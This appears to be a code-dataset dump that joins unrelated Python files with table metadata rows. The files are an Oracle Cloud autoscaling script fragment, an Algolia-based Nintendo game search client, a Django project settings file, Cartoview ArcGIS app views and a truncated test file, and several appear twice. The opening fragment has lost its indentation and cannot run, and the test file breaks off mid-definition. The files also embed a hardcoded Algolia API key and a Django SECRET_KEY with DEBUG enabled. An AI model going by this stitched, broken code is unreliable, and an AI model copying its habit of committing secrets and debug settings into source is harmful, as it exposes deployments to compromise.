time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) GoldenGate startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Data Integration Workshop
###################################################################################
if resource.resource_type == "DISWorkspace":
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if resourceDetails.lifecycle_state == "ACTIVE" and int(
schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Data Integration Workspace shutdown for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.stop_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace shutdown for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(
" - Error ({}) Data Integration Workspace Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Data Integration Shutdown for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(
schedulehours[CurrentHour]) == 1:
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Data Integration Workspace startup for {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = dataintegration.start_workspace(workspace_id=resource.identifier)
Retry = False
success.append(" - Initiate Data Integration Workspace startup for {}".format(
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(
RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Data Integration Startup startup for {} - {}".format(
response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# Wait for any AutonomousDB and Instance Pool Start and rescale tasks completed
###################################################################################
MakeOut("Waiting for all threads to complete...")
for t in threads:
t.join()
MakeOut("Region {} Completed.".format(region))
##########################################################################
# Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-ip', action='store_true', default=True, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-a', default="All", dest='action', help='Action All, Down, Up')
parser.add_argument('-tag', default="Schedule", dest='tag', help='Tag to examine, Default=Schedule')
parser.add_argument('-rg', default="", dest='filter_region', help='Filter Region')
parser.add_argument('-ic', default="", dest='compartment_include', help='Include Compartment OCID')
parser.add_argument('-ec', default="", dest='compartment_exclude', help='Exclude Compartment OCID')
parser.add_argument('-ignrtime', action='store_true', default=False, dest='ignore_region_time', help='Ignore Region Time - Use Host Time')
parser.add_argument('-ignoremysql', action='store_true', default=False, dest='ignoremysql', help='Ignore MYSQL processing')
parser.add_argument('-printocid', action='store_true', default=False, dest='print_ocid', help='Print OCID for resources')
parser.add_argument('-topic', default="", dest='topic', help='Topic to send summary in home region')
cmd = parser.parse_args()
if cmd.action != "All" and cmd.action != "Down" and cmd.action != "Up":
parser.print_help()
sys.exit(0)
####################################
# Assign variables
####################################
filter_region = cmd.filter_region
Action = cmd.action
PredefinedTag = cmd.tag
compartment_exclude = cmd.compartment_exclude if cmd.compartment_exclude else ""
compartment_include = cmd.compartment_include if cmd.compartment_include else ""
####################################
# Start print time info
####################################
start_time = str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
print_header("Running Auto Scale")
# Identity extract compartments
config, signer = create_signer(cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
compartments = []
tenancy = None
tenancy_home_region = ""
try:
MakeOut("Starts at " + str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
MakeOut("\nConnecting to Identity Service...")
identity = oci.identity.IdentityClient(config, signer=signer)
tenancy = identity.get_tenancy(config["tenancy"]).data
regions = identity.list_region_subscriptions(tenancy.id).data
for reg in regions:
if reg.is_home_region:
tenancy_home_region = str(reg.region_name)
MakeOut("")
MakeOut("Version : " + str(Version))
MakeOut("Command Line : " + ' '.join(x for x in sys.argv[1:]))
MakeOut("Tenant Name : " + str(tenancy.name))
MakeOut("Tenant Id : " + tenancy.id)
MakeOut("Home Region : " + tenancy_home_region)
MakeOut("Action : " + Action)
MakeOut("Tag : " + PredefinedTag)
if cmd.topic:
MakeOut("Topic : " + cmd.topic)
if cmd.filter_region:
MakeOut("Filter Region : " + cmd.filter_region)
MakeOut("")
compartments = identity_read_compartments(identity, tenancy)
except Exception as e:
raise RuntimeError("\nError connecting to Identity Service - " + str(e))
############################################
# Define Global Variables to store info
############################################
success = []
errors = []
total_resources = 0
ErrorsFound = False
############################################
# Loop on all regions
############################################
for region_name in [str(es.region_name) for es in regions]:
if cmd.filter_region:
if cmd.filter_region not in region_name:
continue
print_header("Region " + region_name)
# set the region in the config and signer
config['region'] = region_name
signer.region = region_name
###############################################
# services - global used by threads as well
###############################################
compute = oci.core.ComputeClient(config, signer=signer)
database = oci.database.DatabaseClient(config, signer=signer)
pool = oci.core.ComputeManagementClient(config, signer=signer)
search = oci.resource_search.ResourceSearchClient(config, signer=signer)
oda = oci.oda.OdaClient(config, signer=signer)
analytics = oci.analytics.AnalyticsClient(config, signer=signer)
integration = oci.integration.IntegrationInstanceClient(config, signer=signer)
loadbalancer = oci.load_balancer.LoadBalancerClient(config, signer=signer)
mysql = oci.mysql.DbSystemClient(config, signer=signer)
goldengate = oci.golden_gate.GoldenGateClient(config, signer=signer)
dataintegration = oci.data_integration.DataIntegrationClient(config, signer=signer)
###############################################
# Run Scale Region
###############################################
autoscale_region(region_name)
############################################
# Send summary if Topic Specified
############################################
if cmd.topic:
# set the home region in the config and signer
config['region'] = tenancy_home_region
signer.region = tenancy_home_region
ns = oci.ons.NotificationDataPlaneClient(config, signer=signer)
if LogLevel == "ALL" or (LogLevel == "ERRORS" and ErrorsFound):
MakeOut("\nPublishing notification")
body_message = "Scaling ({}) just completed. Found {} errors across {} scaleable instances (from a total of {} instances). \nError Details: {}\n\nSuccess Details: {}".format(Action, len(errors), len(success), total_resources, errors, success)
Retry = True
while Retry:
try:
ns_response = ns.publish_message(cmd.topic, {"title": "Scaling Script ran across tenancy: {}".format(tenancy.name), "body": body_message})
Retry = False
except oci.exceptions.ServiceError as ns_response:
if ns_response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
MakeOut("Error ({}) publishing notification - {}".format(ns_response.status, ns_response.message))
Retry = False
MakeOut("All scaling tasks done, checked {} resources.".format(total_resources))
| true | true |
f72314bffd466950af85d5cfd1e7aca8dcb3c114 | 2,130 | py | Python | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 37 | 2020-04-30T13:48:02.000Z | 2022-03-09T04:55:54.000Z | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 4 | 2020-05-09T03:17:44.000Z | 2021-04-28T00:53:55.000Z | nintendeals/noa/api/algolia.py | Pooroomoo/nintendeals | 993f4d159ff405ed82cd2bb023c7b75d921d0acb | [
"MIT"
] | 5 | 2020-07-22T06:42:27.000Z | 2022-02-07T22:35:57.000Z | from typing import Iterator, Optional
from algoliasearch.search_client import SearchClient
from nintendeals.commons.enumerates import Platforms
APP_ID = "U3B6GR4UA3"
API_KEY = "c4da8be7fd29f0f5bfa42920b0a99dc7"
INDEX_NAME = "ncom_game_en_us"
INDEX = None
PLATFORMS = {
Platforms.NINTENDO_3DS: "Nintendo 3DS",
Platforms.NINTENDO_SWITCH: "Nintendo Switch",
Platforms.NINTENDO_WIIU: "Wii U",
}
PLATFORM_CODES = {
Platforms.NINTENDO_3DS: "5001",
Platforms.NINTENDO_SWITCH: "7001",
Platforms.NINTENDO_WIIU: "Wii U",
}
def _search_index(query, **options):
global INDEX
if not INDEX:
client = SearchClient.create(APP_ID, API_KEY)
INDEX = client.init_index(INDEX_NAME)
response = INDEX.search(query, request_options=options)
return response.get('hits', [])
def search_by_nsuid(nsuid: str) -> Optional[dict]:
hits = _search_index(nsuid, restrictSearchableAttributes=['nsuid'])
return (hits or [{}])[0]
def search_by_platform(platform: Platforms) -> Iterator[dict]:
empty_pages = 0
platform_code = PLATFORM_CODES[platform]
options = {
"allowTyposOnNumericTokens": False,
"queryType": "prefixAll",
"restrictSearchableAttributes": ["nsuid"],
"facetFilters": [
f"platform:{PLATFORMS[platform]}"
],
"hitsPerPage": 500,
}
current = -1
while True:
current += 1
query = f"{platform_code}{current:07}"
games = _search_index(query, **options)
if not games:
empty_pages += 1
if empty_pages == 5:
break
yield from games
def search_by_query(query: str, platform: Platforms = None) -> Iterator[dict]:
hits_per_page = 50
options = {
"hitsPerPage": hits_per_page,
}
if platform:
options["facetFilters"] = [
f"platform:{PLATFORMS[platform]}"
]
page = -1
while True:
page += 1
options["page"] = page
games = _search_index(query, **options)
yield from games
if len(games) < hits_per_page:
break
| 21.734694 | 78 | 0.631455 | from typing import Iterator, Optional
from algoliasearch.search_client import SearchClient
from nintendeals.commons.enumerates import Platforms
APP_ID = "U3B6GR4UA3"
API_KEY = "c4da8be7fd29f0f5bfa42920b0a99dc7"
INDEX_NAME = "ncom_game_en_us"
INDEX = None
PLATFORMS = {
Platforms.NINTENDO_3DS: "Nintendo 3DS",
Platforms.NINTENDO_SWITCH: "Nintendo Switch",
Platforms.NINTENDO_WIIU: "Wii U",
}
PLATFORM_CODES = {
Platforms.NINTENDO_3DS: "5001",
Platforms.NINTENDO_SWITCH: "7001",
Platforms.NINTENDO_WIIU: "Wii U",
}
def _search_index(query, **options):
global INDEX
if not INDEX:
client = SearchClient.create(APP_ID, API_KEY)
INDEX = client.init_index(INDEX_NAME)
response = INDEX.search(query, request_options=options)
return response.get('hits', [])
def search_by_nsuid(nsuid: str) -> Optional[dict]:
hits = _search_index(nsuid, restrictSearchableAttributes=['nsuid'])
return (hits or [{}])[0]
def search_by_platform(platform: Platforms) -> Iterator[dict]:
empty_pages = 0
platform_code = PLATFORM_CODES[platform]
options = {
"allowTyposOnNumericTokens": False,
"queryType": "prefixAll",
"restrictSearchableAttributes": ["nsuid"],
"facetFilters": [
f"platform:{PLATFORMS[platform]}"
],
"hitsPerPage": 500,
}
current = -1
while True:
current += 1
query = f"{platform_code}{current:07}"
games = _search_index(query, **options)
if not games:
empty_pages += 1
if empty_pages == 5:
break
yield from games
def search_by_query(query: str, platform: Platforms = None) -> Iterator[dict]:
hits_per_page = 50
options = {
"hitsPerPage": hits_per_page,
}
if platform:
options["facetFilters"] = [
f"platform:{PLATFORMS[platform]}"
]
page = -1
while True:
page += 1
options["page"] = page
games = _search_index(query, **options)
yield from games
if len(games) < hits_per_page:
break
| true | true |
f72314c8dbffd0d7e7aa5f6a9597732183754bb7 | 3,262 | py | Python | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | yatube/yatube/settings.py | TopcuoH/Yatube | 8f970863cac9a380d37918a80ccc80e7d3e3bb8f | [
"BSD-3-Clause"
] | null | null | null | """
Django settings for yatube project.
Generated by 'django-admin startproject' using Django 2.2.19.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'hueqoy8@&b21ty0-(w_!@%*&##8%rn6!=e+0h)nyi$&*rbcopd'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'posts.apps.PostsConfig', # Добавленная запись
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yatube.urls'
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yatube.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
| 25.888889 | 91 | 0.696812 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'hueqoy8@&b21ty0-(w_!@%*&##8%rn6!=e+0h)nyi$&*rbcopd'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'posts.apps.PostsConfig', # Добавленная запись
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'yatube.urls'
TEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'yatube.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
| true | true |
f72315a3756903ad9bc3a96587225537f9bf97cd | 603 | py | Python | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 25 | 2020-10-27T19:10:36.000Z | 2022-01-04T14:34:29.000Z | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 5 | 2020-10-15T00:52:30.000Z | 2021-01-18T18:42:40.000Z | tests/agents/test_gpc.py | vvanirudh/deluca | 673e66038547db90a7b23335cfe7508728076a4d | [
"Apache-2.0"
] | 5 | 2020-12-04T23:12:13.000Z | 2021-06-26T12:38:06.000Z | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""tests.agents.test_gpc"""
| 40.2 | 74 | 0.759536 | true | true | |
f723165ba6a75461f7b45d6169d0437a41afef33 | 3,094 | py | Python | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | analytics/settings.py | moemosaad/DjYamosaWebsite | 79b5528b0f5cb617231aca50eefcb4a2837086ac | [
"MIT"
] | null | null | null | """
Django settings for DjYamosa project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '449k7&ayn!ds)p#=c_+v4p%48ca&og=n8+ocex=p&q$fg$b+=#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjYamosa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjYamosa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| 25.570248 | 91 | 0.694893 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = '449k7&ayn!ds)p#=c_+v4p%48ca&og=n8+ocex=p&q$fg$b+=#'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjYamosa.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjYamosa.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| true | true |
f723169d1f5bcd6c14f9e7dcb7f292f96f8606c2 | 3,314 | py | Python | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | views.py | cartologic/cartoview_esri_app_starter | dca4649fe0200e9b9b709293697a5807a405f6d1 | [
"Apache-2.0"
] | null | null | null | import json
import re
from string import rstrip
from urlparse import urljoin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from cartoview.app_manager.models import *
from forms import BasicAppForm
from geonode import settings
from .models import *
APP_NAME = 'cartoview_esri_app_starter'
VIEW_TPL = "%s/index.html" % APP_NAME
NEW_EDIT_TPL = "%s/new.html" % APP_NAME
def view(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
config_json = json.loads(remove_json_comments(basic_app_obj.config))
config_json['webmap'] = str(basic_app_obj.web_map_id)
config_json['title'] = basic_app_obj.title
config_json['description'] = basic_app_obj.abstract
config_json['sharinghost'] = rstrip(str(urljoin(settings.SITEURL, reverse("arcportal_home"))), '/')
context = {'config_json': json.dumps(config_json)}
return render(request, VIEW_TPL, context)
def save(request, app_form):
basic_app_obj = app_form.save(commit=False)
# get app by name and add it to app instance.
basic_app_obj.app = App.objects.get(name=APP_NAME)
# get current user and add it as app instance owner.
basic_app_obj.owner = request.user
basic_app_obj.save()
# redirect to app instance details after saving instance.
return HttpResponseRedirect(reverse('appinstance_detail', kwargs={'appinstanceid': basic_app_obj.pk}))
#
def new(request):
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form')
return save(request, app_form)
else:
# form is invalid.
context = {'app_form': BasicAppForm(prefix='app_form')}
return render(request, NEW_EDIT_TPL, context)
def edit(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form', instance=basic_app_obj)
return save(request, app_form)
else:
# form is invalid.
context = {'app_form': BasicAppForm(prefix='app_form', instance=basic_app_obj)}
return render(request, NEW_EDIT_TPL, context)
# ------------- Utility functions to handle json comments -------------
# Regular expression for comments
comment_re = re.compile(
'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE
)
comments_exception = {'http://': 'HTTP_PLACE_HOLDER', 'https://': 'HTTPS_PLACE_HOLDER',
'location.protocol + "//': 'LOCATION_PLACE_HOLDER'}
def remove_json_comments(json_string):
""" Parse a JSON file
First remove comments and then use the json module package
Comments look like :
// ...
or
/*
...
*/
"""
content = json_string # ''.join(json_string)
for key in comments_exception:
content = content.replace(key, comments_exception[key])
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
for key in comments_exception:
content = content.replace(comments_exception[key], key)
# Return json
return content
| 31.264151 | 106 | 0.673808 | import json
import re
from string import rstrip
from urlparse import urljoin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from cartoview.app_manager.models import *
from forms import BasicAppForm
from geonode import settings
from .models import *
APP_NAME = 'cartoview_esri_app_starter'
VIEW_TPL = "%s/index.html" % APP_NAME
NEW_EDIT_TPL = "%s/new.html" % APP_NAME
def view(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
config_json = json.loads(remove_json_comments(basic_app_obj.config))
config_json['webmap'] = str(basic_app_obj.web_map_id)
config_json['title'] = basic_app_obj.title
config_json['description'] = basic_app_obj.abstract
config_json['sharinghost'] = rstrip(str(urljoin(settings.SITEURL, reverse("arcportal_home"))), '/')
context = {'config_json': json.dumps(config_json)}
return render(request, VIEW_TPL, context)
def save(request, app_form):
basic_app_obj = app_form.save(commit=False)
basic_app_obj.app = App.objects.get(name=APP_NAME)
basic_app_obj.owner = request.user
basic_app_obj.save()
return HttpResponseRedirect(reverse('appinstance_detail', kwargs={'appinstanceid': basic_app_obj.pk}))
def new(request):
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form')
return save(request, app_form)
else:
context = {'app_form': BasicAppForm(prefix='app_form')}
return render(request, NEW_EDIT_TPL, context)
def edit(request, resource_id):
basic_app_obj = BasicEsriApp.objects.get(pk=resource_id)
if request.method == 'POST':
app_form = BasicAppForm(request.POST, prefix='app_form', instance=basic_app_obj)
return save(request, app_form)
else:
context = {'app_form': BasicAppForm(prefix='app_form', instance=basic_app_obj)}
return render(request, NEW_EDIT_TPL, context)
comment_re = re.compile(
'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE
)
comments_exception = {'http://': 'HTTP_PLACE_HOLDER', 'https://': 'HTTPS_PLACE_HOLDER',
'location.protocol + "//': 'LOCATION_PLACE_HOLDER'}
def remove_json_comments(json_string):
content = json_string # ''.join(json_string)
for key in comments_exception:
content = content.replace(key, comments_exception[key])
# Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
for key in comments_exception:
content = content.replace(comments_exception[key], key)
# Return json
return content
| true | true |
f72316a939081794a0a3bc72714dad3bdabb1b10 | 2,878 | py | Python | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | 4 | 2019-06-04T08:15:43.000Z | 2020-10-03T13:59:15.000Z | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | null | null | null | tc_gan/networks/tests/test_tuning_curve.py | ahmadianlab/tc-gan | 06c549e8ae74bc6af62fddeed698565ea1f548c5 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from ...core import consume_config
from ..cwgan import ConditionalTuningCurveGenerator
from ..ssn import emit_tuning_curve_generator, ssn_type_choices
from ..wgan import DEFAULT_PARAMS
from .test_euler_ssn import JDS
TEST_PARAMS = dict(
DEFAULT_PARAMS,
# Stimulator:
num_tcdom=10,
num_sites=50,
# Model / SSN:
tau_E=2,
dt=0.1,
seqlen=240,
skip_steps=200,
# Prober:
probes=[0],
**JDS # Model / SSN
)
del TEST_PARAMS['bandwidths']
del TEST_PARAMS['contrasts']
del TEST_PARAMS['sample_sites']
del TEST_PARAMS['gen']
del TEST_PARAMS['disc']
def emit_tcg_for_test(**kwargs):
